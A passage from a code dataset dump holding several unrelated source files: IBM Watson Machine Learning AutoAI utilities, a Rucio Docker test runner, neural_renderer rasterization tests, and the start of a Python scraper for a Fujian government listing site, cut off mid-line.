if that fails, use pkg_resources\n try:\n installed_module_version = fallback_to_pip_for_version_check(package)\n\n except Exception:\n installed_module_version = pkg_resources.get_distribution(package['name']).version\n\n # workaround for autoai-libs and numpy versions in SW spec\n if package['name'] == 'autoai-libs' or package['name'] == 'numpy' or package['name'] == 'lale':\n if version.parse(installed_module_version) < version.parse(package['version']):\n errored_packages.append(package)\n\n else:\n if installed_module_version != package['version']:\n errored_packages.append(package)\n\n except pkg_resources.DistributionNotFound as e:\n errored_packages.append(package)\n\n else:\n pass\n\n if errored_packages:\n raise LibraryNotCompatible(reason=f\"Please check if you have installed correct versions \"\n f\"of the following packages: {errored_packages} \"\n f\"These packages are required to load ML model successfully \"\n f\"on your environment.\")\n\n return check_lale\n\n\ndef prepare_cos_client(\n training_data_references: List['DataConnection'] = None,\n training_result_reference: 'DataConnection' = None) -> Tuple[Union[List[Tuple['DataConnection', 'resource']]],\n Union[Tuple['DataConnection', 'resource'], None]]:\n \"\"\"\n Create COS clients for training data and results.\n\n Parameters\n ----------\n training_data_references: List['DataConnection'], optional\n\n training_result_reference: 'DataConnection', optional\n\n Returns\n -------\n list of COS clients for training data, client for results\n \"\"\"\n from ibm_watson_machine_learning.helpers import S3Connection\n from ibm_boto3 import resource\n from ibm_botocore.client import Config\n\n def differentiate_between_credentials(connection: 'S3Connection') -> 'resource':\n # note: we do not know which version of COS credentials the user used during training\n if hasattr(connection, 'auth_endpoint') and hasattr(connection, 'api_key'):\n cos_client = resource(\n service_name='s3',\n ibm_api_key_id=connection.api_key,\n ibm_auth_endpoint=connection.auth_endpoint,\n config=Config(signature_version=\"oauth\"),\n endpoint_url=connection.endpoint_url\n )\n\n else:\n cos_client = resource(\n service_name='s3',\n endpoint_url=connection.endpoint_url,\n aws_access_key_id=connection.access_key_id,\n aws_secret_access_key=connection.secret_access_key\n )\n # --- end note\n\n return cos_client\n\n cos_client_results = None\n data_cos_clients = []\n\n if training_result_reference is not None:\n if (isinstance(training_result_reference.connection, S3Connection) or\n training_result_reference._check_if_connection_asset_is_s3()):\n cos_client_results = (training_result_reference,\n differentiate_between_credentials(connection=training_result_reference.connection))\n\n if training_data_references is not None:\n for reference in training_data_references:\n if isinstance(reference.connection, S3Connection) or reference._check_if_connection_asset_is_s3():\n data_cos_clients.append((reference,\n differentiate_between_credentials(connection=reference.connection)))\n\n return data_cos_clients, cos_client_results\n\n\ndef create_summary(details: dict, scoring: str) -> 'DataFrame':\n \"\"\"\n Creates summary in a form of a pandas.DataFrame of computed pipelines (should be used in remote and local scenario\n with COS).\n\n Parameters\n ----------\n details: dict, required\n Dictionary with all training data\n\n scoring: str, required\n scoring method\n\n Returns\n -------\n pandas.DataFrame with pipelines summary\n \"\"\"\n from pandas import DataFrame\n\n 
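# note (added): a run carries either 'ml_metrics' (classification/regression) or 'ts_metrics' (time series forecasting); the two flags below pick the matching column layout and sort order\n 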
is_ml_metrics = 'ml_metrics' in details['entity']['status'].get('metrics', [{}])[0]\n is_ts_metrics = 'ts_metrics' in details['entity']['status'].get('metrics', [{}])[0]\n\n if not is_ml_metrics and not is_ts_metrics:\n raise NoAvailableMetrics()\n\n def get_metrics_names():\n if is_ml_metrics:\n return details['entity']['status'].get('metrics', [{}])[0].get('ml_metrics', {}).keys()\n elif is_ts_metrics:\n names = list(['validation_' + x for x in details['entity']['status'].get('metrics', [{}])[0].get('ts_metrics', {}).get('training',{}).keys()])\n try:\n holdout_names = list(['holdout_' + y for y in [x for x in details['entity']['status'].get('metrics', [{}]) if 'holdout' in x['ts_metrics']][0]['ts_metrics']['holdout'].keys()])\n except IndexError:\n holdout_names = []\n try:\n backtest_names = list(['backtest_' + y for y in [x for x in details['entity']['status'].get('metrics', [{}]) if 'backtest' in x['ts_metrics']][0]['ts_metrics']['backtest']['avg'].keys()])\n except IndexError:\n backtest_names = []\n\n\n return names + holdout_names + backtest_names\n\n def is_winner(pipeline_name): # ts only\n if is_ts_metrics:\n return len(list([x for x in details['entity']['status'].get('metrics', [{}])\n if x['context']['intermediate_model']['name'] == pipeline_name and 'holdout' in x['ts_metrics']])) > 0\n elif is_ml_metrics:\n return True\n\n if is_ml_metrics:\n columns = ['Pipeline Name', 'Enhancements', 'Estimator']\n elif is_ts_metrics:\n columns = ['Pipeline Name', 'Enhancements', 'Estimator', 'Winner']\n\n columns = (columns +\n [metric_name for metric_name in\n get_metrics_names()])\n values = []\n\n for pipeline in details['entity']['status'].get('metrics', []):\n model_number = pipeline['context']['intermediate_model']['name'].split('P')[-1]\n model_phase = chose_model_output(model_number, is_ml_metrics, is_ts_metrics)\n\n if pipeline['context']['phase'] == model_phase:\n if is_ml_metrics:\n enhancements = []\n steps = pipeline['context']['intermediate_model']['composition_steps']\n\n if any('hpo' in s for s in steps):\n enhancements.append('HPO')\n if 'cognito' in steps:\n enhancements.append('FE')\n if 'Text_FE' in steps:\n enhancements.append('Text_FE')\n\n enhancements = ', '.join(enhancements)\n elif is_ts_metrics:\n enhancements = 'HPO, FE'\n\n def get_metrics_items():\n if is_ml_metrics:\n return pipeline['ml_metrics'].items()\n elif is_ts_metrics:\n def prepare_items(metrics, pipeline_name, metric_name, prefix):\n try:\n chosen_obj = [x for x in metrics if x['context']['intermediate_model']['name'] == pipeline_name and metric_name in x['ts_metrics']][0]\n except Exception as e:\n return []\n\n if metric_name == 'backtest':\n return list({prefix + x: chosen_obj['ts_metrics'][metric_name]['avg'][x] for x in chosen_obj['ts_metrics'][metric_name]['avg']}.items())\n else:\n return list({prefix + x: chosen_obj['ts_metrics'][metric_name][x] for x in chosen_obj['ts_metrics'][metric_name]}.items())\n\n pipeline_name = pipeline['context']['intermediate_model']['name']\n metrics = details['entity']['status'].get('metrics', [])\n training_items = prepare_items(metrics, pipeline_name, 'training', 'validation_')\n holdout_items = prepare_items(metrics, pipeline_name, 'holdout', 'holdout_')\n backtest_items = prepare_items(metrics, pipeline_name, 'backtest', 'backtest_')\n\n return training_items + holdout_items + backtest_items\n\n # note: workaround when some pipelines have less or more metrics computed\n if is_ml_metrics:\n metrics = columns[3:]\n elif is_ts_metrics:\n metrics = 
columns[4:]\n pipeline_metrics = [None] * len(metrics)\n for metric, value in get_metrics_items():\n for i, metric_name in enumerate(metrics):\n if metric_name == metric:\n pipeline_metrics[i] = value\n # --- end note\n\n if is_ml_metrics:\n values.append(\n ([f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"] +\n [enhancements] +\n [pipeline['context']['intermediate_model']['pipeline_nodes'][-1]] +\n pipeline_metrics\n ))\n elif is_ts_metrics:\n values.append(\n ([f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"] +\n [enhancements] +\n [pipeline['context']['intermediate_model']['pipeline_nodes'][-1]] +\n [is_winner(pipeline['context']['intermediate_model']['name'])] +\n pipeline_metrics\n ))\n\n pipelines = DataFrame(data=values, columns=columns)\n pipelines.drop_duplicates(subset=\"Pipeline Name\", keep='first', inplace=True)\n pipelines.set_index('Pipeline Name', inplace=True)\n\n try:\n if is_ml_metrics:\n pipelines = pipelines.sort_values(\n by=[f\"training_{scoring}\"], ascending=False).rename(\n {\n f\"training_{scoring}\":\n f\"training_{scoring}_(optimized)\"\n }, axis='columns')\n elif is_ts_metrics:\n pipelines = pipelines.sort_values(\n by=['Winner'] + get_metrics_names(), ascending=False)\n\n # note: sometimes backend will not return 'training_' prefix to the metric\n except KeyError:\n pass\n\n # for columns with _neg_ inside name\n neg_columns = [col for col in pipelines if '_neg_' in col]\n pipelines[neg_columns] = pipelines[neg_columns].apply(lambda x: -x if x is not None else x)\n pipelines = pipelines.rename(columns={col: col.replace('_neg_', '_') for col in neg_columns})\n\n # for columns with neg_ on beginning of name\n neg_columns = [col for col in pipelines if col.startswith('neg_')]\n pipelines[neg_columns] = pipelines[neg_columns].apply(lambda x: -x if x is not None else x)\n pipelines = pipelines.rename(columns={col: col[4:] for col in neg_columns})\n\n return pipelines\n\n\ndef get_node_and_runtime_index(node_name: str, optimizer_config: dict) -> Tuple[int, int]:\n \"\"\"Find node index from node name in experiment parameters.\"\"\"\n node_number = None\n runtime_number = None\n\n for i, node in enumerate(optimizer_config['entity']['document']['pipelines'][0]['nodes']):\n if node_name == 'kb' and (node.get('id') == 'kb' or node.get('id') == 'automl'):\n node_number = i\n break\n\n elif node_name == 'obm' and node.get('id') == 'obm':\n node_number = i\n break\n\n for i, runtime in enumerate(optimizer_config['entity']['document']['runtimes']):\n if node_name == 'kb' and (runtime.get('id') == 'kb' or runtime.get('id') == 'automl' or\n runtime.get('id') == 'autoai'):\n runtime_number = i\n break\n\n elif node_name == 'obm' and runtime.get('id') == 'obm':\n runtime_number = i\n break\n\n return node_number, runtime_number\n\n\ndef download_experiment_details_from_file(result_client_and_connection: Tuple['DataConnection', 'resource']) -> dict:\n \"\"\"Try to download training details from user COS.\"\"\"\n\n try:\n file = result_client_and_connection[1].Object(\n result_client_and_connection[0].location.bucket,\n result_client_and_connection[0].location._training_status).get()\n\n details = json.loads(file['Body'].read())\n\n except Exception as e:\n raise CannotDownloadTrainingDetails('', reason=f\"Error: {e}\")\n\n return details\n\n\ndef download_wml_pipeline_details_from_file(result_client_and_connection: Tuple['DataConnection', 'resource']) -> dict:\n \"\"\"Try to download wml pipeline details from 
user COS.\"\"\"\n\n    try:\n        path = result_client_and_connection[0].location._model_location.split('model.pickle')[0]\n        path = f\"{path}pipeline-model.json\"\n\n        file = result_client_and_connection[1].Object(\n            result_client_and_connection[0].location.bucket,\n            path).get()\n\n        details = json.loads(file['Body'].read())\n\n    except Exception as e:\n        raise CannotDownloadWMLPipelineDetails('', reason=f\"Error: {e}\")\n\n    return details\n\n\ndef prepare_model_location_path(model_path: str) -> str:\n    \"\"\"\n    To get the best pipeline after computation, we need to change the model_location string to point at global_output.\n    \"\"\"\n\n    if \"data/automl/\" in model_path:\n        path = model_path.split('data/automl/')[0]\n        path = f\"{path}data/automl/global_output/\"\n\n    else:\n        path = model_path.split('data/kb/')[0]\n        path = f\"{path}data/kb/global_output/\"\n\n    return path\n\n\ndef check_graphviz_binaries(f):\n    @wraps(f)\n    def _f(*method_args, **method_kwargs):\n        from graphviz.backend import ExecutableNotFound\n        try:\n            output = f(*method_args, **method_kwargs)\n\n        except ExecutableNotFound:\n            raise VisualizationFailed(\n                reason=f\"Cannot perform visualization with graphviz. Please make sure that you have Graphviz binaries \"\n                       f\"installed in your system. Please follow this guide: https://www.graphviz.org/download/\")\n\n        return output\n\n    return _f\n\n\ndef get_sw_spec_and_type_based_on_sklearn(client: 'APIClient', spec: str) -> Tuple[str, str]:\n    \"\"\"Based on the user environment and the pipeline sw spec, check the sklearn version and find the appropriate sw spec.\n\n    Returns\n    -------\n    model_type, sw_spec\n    \"\"\"\n    import sklearn\n\n    if '0.20.' in sklearn.__version__ and spec in ['autoai-kb_3.0-py3.6', 'autoai-ts_1.0-py3.6']:\n        sw_spec = client.software_specifications.get_id_by_name('autoai-kb_3.0-py3.6')\n        model_type = 'scikit-learn_0.20'\n\n    elif '0.20.' in sklearn.__version__ and spec not in ['autoai-kb_3.0-py3.6', 'autoai-ts_1.0-py3.6']:\n        raise LibraryNotCompatible(reason=\"Your version of scikit-learn is different than the trained pipeline. \"\n                                          \"Trained pipeline version: 0.23.* \"\n                                          \"Your version: \" + sklearn.__version__)\n\n    elif '0.23.' in sklearn.__version__ and spec in ['autoai-kb_3.1-py3.7', 'autoai-ts_1.0-py3.7']:\n        sw_spec = client.software_specifications.get_id_by_name('autoai-kb_3.1-py3.7')\n        model_type = 'scikit-learn_0.23'\n\n    elif '0.23.' in sklearn.__version__ and spec not in ['autoai-kb_3.1-py3.7', 'autoai-ts_1.0-py3.7']:\n        raise LibraryNotCompatible(reason=\"Your version of scikit-learn is different than the trained pipeline. \"\n                                          \"Trained pipeline version: 0.20.* \"\n                                          \"Your version: \" + sklearn.__version__)\n\n    else:\n        raise LibraryNotCompatible(reason=\"Your version of scikit-learn is not supported. 
Use one of [0.20.*, 0.23.*]\")\n\n return model_type, sw_spec\n\n\ndef validate_additional_params_for_optimizer(params):\n expected_params = [\n 'learning_type', 'positive_label', 'scorer_for_ranking', 'scorers', 'num_folds', 'random_state',\n 'preprocessor_flag', 'preprocessor_hpo_flag', 'preprocessor_hpo_estimator', 'hpo_searcher', 'cv_num_folds',\n 'hpo_d_iter_threshold', 'hpo_c_iter_threshold', 'max_initial_points', 'preprocess_transformer_chain',\n 'daub_ensembles_flag', 'max_num_daub_ensembles', 'run_hpo_after_daub_flag', 'daub_include_only_estimators',\n 'run_cognito_flag', 'cognito_ensembles_flag', 'max_num_cognito_ensembles', 'cognito_display_flag',\n 'run_hpo_after_cognito_flag', 'cognito_kwargs', 'cognito_scorers', 'daub_adaptive_subsampling_max_mem_usage',\n 'daub_adaptive_subsampling_used_mem_ratio_threshold', 'daub_kwargs', 'compute_feature_importances_flag',\n 'compute_feature_importances_options', 'compute_feature_importances_pipeline_options', 'show_status_flag',\n 'status_msg_handler', 'state_max_report_priority', 'msg_max_report_priority', 'cognito_pass_ptype',\n 'hpo_timeout_in_seconds', 'cognito_use_feature_importances_flag', 'cognito_max_iterations',\n 'cognito_max_search_level', 'cognito_transform_names', 'cognito_use_grasspile', 'cognito_subsample',\n 'holdout_param', 'missing_values_reference_list', 'datetime_processing_flag',\n 'datetime_delete_source_columns', 'datetime_processing_options', 'ensemble_pipelines_flag', 'ensemble_tags',\n 'ensemble_comb_method', 'ensemble_selection_flag', 'ensemble_weighted_flag', 'ensemble_corr_sel_method',\n 'ensemble_corr_termination_diff_threshold', 'ensemble_num_best_pipelines', 'ensemble_num_folds',\n 'compute_pipeline_notebooks_flag', 'pipeline_ranking_metric', 'cpus_available', 'wml_status_msg_version',\n 'float32_processing_flag', 'train_remove_missing_target_rows_flag', 'train_sample_rows_test_size',\n 'train_sample_columns_index_list', 'preprocessor_cat_imp_strategy', 'preprocessor_cat_enc_encoding',\n 'preprocessor_num_imp_strategy', 'preprocessor_num_scaler_use_scaler_flag', 'preprocessor_num_scaler_with_mean',\n 'preprocessor_num_scaler_with_std', 'preprocessor_string_compress_type', 'FE_drop_unique_columns_flag',\n 'FE_drop_constant_columns_flag', 'FE_add_frequency_columns_flag', 'FE_add_missing_indicator_columns_flag',\n 'data_provenance', 'target_label_name', 'preprocessor_data_filename', 'cognito_data_filename',\n 'holdout_roc_curve_max_size', 'holdout_reg_pred_obs_max_size', 'max_estimator_n_jobs',\n 'enabled_feature_engineering_as_json', 'fairness_info', 'text_processing', 'word2vec_feature_number',\n '_enable_snapml_estimators'\n ]\n\n for k in params:\n if k not in expected_params:\n raise AdditionalParameterIsUnexpected(k)\n\n\ndef download_request_json(run_params: dict, model_name: str, wml_client) -> dict:\n run_id = run_params['metadata']['id']\n is_ml_metrics = 'ml_metrics' in run_params['entity']['status'].get('metrics')[-1]\n is_ts_metrics = 'ts_metrics' in run_params['entity']['status'].get('metrics')[-1]\n\n if not is_ml_metrics and not is_ts_metrics:\n raise NoAvailableMetrics()\n\n pipeline_info = run_params['entity']['status'].get('metrics')[-1]\n schema_path = f\"{pipeline_info['context']['intermediate_model']['schema_location']}\"\n if is_ml_metrics:\n model_number = model_name.split('_')[-1]\n model_output = chose_model_output(model_number)\n elif is_ts_metrics:\n model_number = pipeline_info['context']['intermediate_model']['name'][1:]\n model_output = 'after_final_pipelines_generation'\n 
request_path = f\"{schema_path.split('/data/')[0]}/assets/{run_id}_P{model_number}_{model_output}/resources/wml_model/request.json\"\n\n if wml_client.ICP:\n request_str = load_file_from_file_system(wml_client=wml_client, file_path=request_path).read().decode()\n # note: only if there was 1 estimator during training\n if 'content_location' not in request_str:\n request_path = f\"{schema_path.split('/data/')[0]}/assets/{run_id}_P{model_number}_compose_model_type_output/resources/wml_model/request.json\"\n request_str = load_file_from_file_system(wml_client=wml_client, file_path=request_path).read().decode()\n\n else:\n cos_client = init_cos_client(run_params['entity']['results_reference']['connection'])\n bucket = run_params['entity']['results_reference']['location']['bucket']\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n # note: only if there was 1 estimator during training\n if 'content_location' not in request_str:\n request_path = f\"{schema_path.split('/data/')[0]}/assets/{run_id}_P{model_number}_compose_model_type_output/resources/wml_model/request.json\"\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n request_json: Dict[str, dict] = json.loads(request_str)\n\n return request_json\n\n\ndef is_list_composed_from_enum(sequence: List[Union[str, enum.Enum]],\n enum_class: Union[object, enum.EnumMeta]\n ) -> None:\n \"\"\"\n Check if all the elements of a given sequence are values of a given enum class.\n\n Parameters\n ----------\n sequence: List[Union[str, enum.Enum]\n Sequence of elements.\n enum_class: Union[object, enum.EnumMeta]\n Class for which validation will be performed.\n It can be a class inheriting from enum.Enum or class which only contains\n attributes.\n\n Raises\n -------\n InvalidSequenceValue, If element is not from enum class values.\n \"\"\"\n if sequence is not None:\n if isinstance(enum_class, enum.EnumMeta):\n enum_values = [e.value for e in enum_class]\n else:\n attributes = inspect.getmembers(enum_class, lambda attr: not (inspect.isroutine(attr)))\n enum_values = [attr_val for attr_name, attr_val in attributes\n if not(attr_name.startswith('__') and attr_name.endswith('__'))]\n\n for el in sequence:\n el_value = el.value if isinstance(el, enum.Enum) else el\n if el_value not in enum_values:\n if f\"{el_value}Estimator\" not in enum_values:\n raise InvalidSequenceValue(el, enum_values)\n\n\ndef validate_optimizer_enum_values(\n prediction_type: str,\n daub_include_only_estimators: List[Union[ClassificationAlgorithms,\n RegressionAlgorithms,\n ForecastingAlgorithms]],\n include_only_estimators: List[Union[ClassificationAlgorithms,\n RegressionAlgorithms,\n ForecastingAlgorithms]],\n cognito_transform_names: List[Transformers],\n scoring: str,\n t_shirt_size: str) -> None:\n \"\"\"\n Validate if passed optimizer variables takes values from defined enums.\n\n Parameters\n ----------\n prediction_type: str\n Type of the prediction.\n daub_include_only_estimators: list\n List of estimators.\n include_only_estimators: list\n List of estimators.\n cognito_transform_names: list\n List of transformers.\n scoring: str\n Type of the metric to optimize with.\n t_shirt_size: str\n The size of the remote AutoAI POD instance.\n\n Raises\n ------\n InvalidSequenceValue, If element is not from enum class values.\n \"\"\"\n if prediction_type == 
PredictionType.REGRESSION:\n estimators_enum = RegressionAlgorithms\n elif prediction_type == PredictionType.FORECASTING:\n estimators_enum = ForecastingAlgorithms\n else:\n estimators_enum = ClassificationAlgorithms\n for (sequence, enum_class) in (\n ([prediction_type], PredictionType),\n (daub_include_only_estimators, estimators_enum),\n (include_only_estimators, estimators_enum),\n (cognito_transform_names, Transformers),\n ([t_shirt_size], TShirtSize)):\n is_list_composed_from_enum(sequence, enum_class)\n\n # Note: scoring can be None or have one of values from Metrics enum.\n if scoring is not None:\n is_list_composed_from_enum([scoring], Metrics)\n\n\ndef fallback_to_pip_for_version_check(package: dict) -> str:\n \"\"\"Use only when you need to check package version by package name with pip.\"\"\"\n try:\n from pip._internal.utils.misc import get_installed_distributions\n packages = get_installed_distributions()\n installed_module_version = None\n for pkg in packages:\n if pkg.key == package['name']:\n installed_module_version = pkg._version\n break\n\n if installed_module_version is None:\n raise pkg_resources.DistributionNotFound()\n\n else:\n return installed_module_version\n\n except Exception:\n raise pkg_resources.DistributionNotFound()\n","sub_path":"venv/Lib/site-packages/ibm_watson_machine_learning/utils/autoai/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":63565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"34467979","text":"#!/usr/bin/env python3\n# Copyright 2020 CERN for the benefit of the ATLAS collaboration.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Authors:\n# - Benedikt Ziemons , 2020\n\nimport itertools\nimport json\nimport os\nimport subprocess\nimport sys\nimport typing\n\n\ndef matches(small: typing.Dict, group: typing.Dict):\n for key in small.keys():\n if key not in group or small[key] != group[key]:\n return False\n return True\n\n\ndef run(*args, env=None):\n print(\"** Running\", \" \".join(args), file=sys.stderr, flush=True)\n if env is None:\n subprocess.run(args, check=True, stdout=sys.stderr, stderr=subprocess.STDOUT)\n else:\n subprocess.run(args, check=True, stdout=sys.stderr, stderr=subprocess.STDOUT, env=env)\n\n\ndef main():\n obj = json.load(sys.stdin)\n cases = (obj[\"matrix\"], ) if isinstance(obj[\"matrix\"], dict) else obj[\"matrix\"]\n\n for case in cases:\n for image, idgroup in obj[\"images\"].items():\n if matches(idgroup, case):\n cid = \"rucio\"\n print(\"*** Starting\", {**case, \"IMAGE\": image}, file=sys.stderr, flush=True)\n docker_env_args = list(itertools.chain(*map(lambda x: ('--env', f'{x[0]}={x[1]}'), case.items())))\n try:\n # Running before_script.sh\n run('./tools/test/before_script.sh', env={**os.environ,\n **case,\n \"DOCKER_PASS_ENV\": ' '.join(docker_env_args),\n \"IMAGE\": image})\n\n # A container named \"rucio\" might have been spawned by before_script\n args = ('docker', 'inspect', '--type', 'container', 'rucio')\n print(\"** 
Checking for running rucio container\", file=sys.stderr, flush=True)\n proc = subprocess.run(args, stdout=subprocess.PIPE, check=False)\n try:\n rucio_containers = json.loads(proc.stdout)\n except ValueError:\n rucio_containers = []\n\n if len(rucio_containers) == 0 or not rucio_containers[0][\"State\"][\"Running\"]:\n # Running rucio container if not already started\n args = ('docker', 'run', '--detach', *docker_env_args, image)\n print(\"** Running\", \" \".join(args), file=sys.stderr, flush=True)\n proc = subprocess.run(args, stdout=subprocess.PIPE, check=True)\n cid = proc.stdout.decode().strip()\n if not cid:\n raise RuntimeError(\"Could not determine container id after docker run\")\n\n # Running install_script.sh\n run('docker', 'exec', '-t', cid, './tools/test/install_script.sh')\n\n # Running test.sh\n run('docker', 'exec', '-t', cid, './tools/test/test.sh')\n finally:\n print(\"*** Finalizing\", {**case, \"IMAGE\": image}, file=sys.stderr, flush=True)\n\n if cid:\n run('docker', 'stop', cid)\n run('docker', 'rm', '-v', cid)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/test/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"183512094","text":"import unittest\nimport os\nimport math\n\nimport torch\nfrom torch.nn import functional as F\nimport numpy as np\nfrom imageio import imread, imsave\n\nimport neural_renderer as nr\nimport utils\n\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\ndata_dir = os.path.join(current_dir, 'data')\n\n\ndef rotation_from_look_at(position, at=[0, 0, 0], up=[0, 1, 0]):\n \"\"\"\n Gives a position and a rotation from elevation and azimuth parameters\n \"\"\"\n at = torch.tensor(at).float()[None, :]\n position = torch.tensor(position).float()[None, :]\n up = torch.tensor(up).float()[None, :]\n\n z_axis = F.normalize(at - position, eps=1e-5)\n x_axis = F.normalize(torch.cross(up, z_axis), eps=1e-5)\n y_axis = F.normalize(torch.cross(z_axis, x_axis), eps=1e-5)\n\n r = torch.cat((x_axis[:, :], y_axis[:, :], z_axis[:, :]), dim=0)\n\n rotation = r.transpose(1, 0)\n return rotation\n\n\nclass TestRasterize(unittest.TestCase):\n def setUp(self):\n batch_size = 4\n camera_distance = 1 + 1 / math.tan(math.radians(30))\n self.position = torch.tensor([0, 0, camera_distance]).float().reshape(1, 1, 3).expand(batch_size, 1, 3)\n\n def test_forward_case1(self):\n \"\"\"Rendering a teapot without anti-aliasing.\"\"\"\n\n # load teapot\n vertices, faces, textures = utils.load_teapot_batch()\n vertices = vertices.cuda()\n faces = faces.cuda()\n textures = textures.cuda()\n\n # create renderer\n renderer = nr.Renderer()\n renderer.camera.position = self.position\n renderer.camera.image_size = 256\n renderer.anti_aliasing = False\n\n # render\n images = renderer(vertices, faces, textures)\n images = images.detach().cpu().numpy()\n image = images[2]\n image = image.transpose((1, 2, 0))\n\n image = (image * 255).astype(np.uint8)\n\n imsave(os.path.join(data_dir, 'test_rasterize1.png'), image)\n\n def test_forward_case2(self):\n \"\"\"Rendering a teapot with anti-aliasing and another viewpoint.\"\"\"\n\n # load teapot\n vertices, faces, textures = utils.load_teapot_batch()\n vertices = vertices.cuda()\n faces = faces.cuda()\n textures = textures.cuda()\n\n # create renderer\n renderer = nr.Renderer()\n p = [1, 1, -2.7]\n renderer.camera.position = torch.tensor(p).view(1, 1, 3).expand(4, 1, 3)\n 
renderer.camera.rotation = rotation_from_look_at(p).expand(4, 3, 3)\n\n # render\n images = renderer(vertices, faces, textures)\n images = images.detach().cpu().numpy()\n image = images[2]\n image = image.transpose((1, 2, 0))\n\n image = (image * 255).astype(np.uint8)\n imsave(os.path.join(data_dir, 'test_rasterize2.png'), image)\n\n def test_forward_case3(self):\n \"\"\"Whether a silhouette by neural renderer matches that by Blender.\"\"\"\n\n # load teapot\n vertices, faces, textures = utils.load_teapot_batch()\n vertices = vertices.cuda()\n faces = faces.cuda()\n textures = textures.cuda()\n\n # create renderer\n renderer = nr.Renderer()\n renderer.camera.position = self.position\n renderer.camera.image_size = 256\n renderer.anti_aliasing = False\n renderer.light_intensity_ambient = 1.0\n renderer.light_intensity_directional = 0.0\n\n images = renderer(vertices, faces, textures)\n images = images.detach().cpu().numpy()\n image = images[2].mean(0)\n\n # load reference image by blender\n ref = imread(os.path.join(data_dir, 'teapot_blender.png'))\n ref = (ref.min(axis=-1) != 255).astype(np.float32)\n\n assert(np.allclose(ref, image))\n\n def test_backward_case1(self):\n \"\"\"Backward if non-zero gradient is out of a face.\"\"\"\n\n vertices = [\n [0.8, 0.8, 1.],\n [0.0, -0.5, 1.],\n [0.2, -0.4, 1.]]\n faces = [[0, 1, 2]]\n pxi = 35\n pyi = 25\n grad_ref = [\n [1.6725862, -0.26021874, 0.],\n [1.41986704, -1.64284933, 0.],\n [0., 0., 0.],\n ]\n\n renderer = nr.Renderer()\n renderer.camera.position = self.position\n renderer.camera.image_size = 64\n renderer.anti_aliasing = False\n renderer.camera.perspective = False\n renderer.light_intensity_ambient = 1.0\n renderer.light_intensity_directional = 0.0\n\n vertices = torch.from_numpy(np.array(vertices, dtype=np.float32)).cuda()\n faces = torch.from_numpy(np.array(faces, dtype=np.int32)).cuda()\n textures = torch.ones(faces.shape[0], 4, 4, 4, 3, dtype=torch.float32).cuda()\n grad_ref = torch.from_numpy(np.array(grad_ref, dtype=np.float32)).cuda()\n vertices, faces, textures, grad_ref = utils.to_minibatch((vertices, faces, textures, grad_ref))\n vertices, faces, textures, grad_ref = vertices.cuda(), faces.cuda(), textures.cuda(), grad_ref.cuda()\n vertices.requires_grad = True\n images = renderer(vertices, faces, textures)\n images = torch.mean(images, dim=1)\n loss = torch.sum(torch.abs(images[:, pyi, pxi] - 1))\n loss.backward()\n\n assert(torch.allclose(vertices.grad, grad_ref, rtol=1e-2))\n\n def test_backward_case2(self):\n \"\"\"Backward if non-zero gradient is on a face.\"\"\"\n\n vertices = [\n [0.8, 0.8, 1.],\n [-0.5, -0.8, 1.],\n [0.8, -0.8, 1.]]\n faces = [[0, 1, 2]]\n pyi = 40\n pxi = 50\n grad_ref = [\n [0.98646867, 1.04628897, 0.],\n [-1.03415668, - 0.10403691, 0.],\n [3.00094461, - 1.55173182, 0.],\n ]\n\n renderer = nr.Renderer()\n renderer.position = self.position\n renderer.camera.image_size = 64\n renderer.anti_aliasing = False\n renderer.camera.perspective = False\n renderer.light_intensity_ambient = 1.0\n renderer.light_intensity_directional = 0.0\n\n vertices = torch.from_numpy(np.array(vertices, dtype=np.float32)).cuda()\n faces = torch.from_numpy(np.array(faces, dtype=np.int32)).cuda()\n textures = torch.ones(faces.shape[0], 4, 4, 4, 3, dtype=torch.float32).cuda()\n grad_ref = torch.from_numpy(np.array(grad_ref, dtype=np.float32)).cuda()\n vertices, faces, textures, grad_ref = utils.to_minibatch((vertices, faces, textures, grad_ref))\n vertices.requires_grad = True\n\n images = renderer(vertices, faces, textures)\n 
images = torch.mean(images, dim=1)\n        loss = torch.sum(torch.abs(images[:, pyi, pxi]))\n        loss.backward()\n\n        assert(torch.allclose(vertices.grad, grad_ref, rtol=1e-2))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_rasterize.py","file_name":"test_rasterize.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"65938183","text":"from urllib import request\nimport os\nimport time\nimport lxml\nimport lxml.html\nimport re\nimport json\nfrom urllib.parse import urljoin\nimport requests\nfrom lxml import etree\nimport cssselect\nimport urllib.request\nimport math\n\n\n\ndef url_open(url):\n    res = request.Request(url) # send the request\n    res.add_header(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\") # open the page and read its content, pretending to be a browser\n    html = request.urlopen(res,timeout = 60).read() # open the page and read it\n    return html # html holds the page content\n\ndef post_id(page,areaCode): # get the content of a main listing page\n    url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action' # target URL\n    data = {}\n    data['fn'] = 'getPowerList'\n    data['areaCode'] = areaCode\n    data['type'] = ''\n    data['keyword'] = ''\n    data['pageSize'] = '10'\n    data['pageNum'] = str(page+1)\n    data = 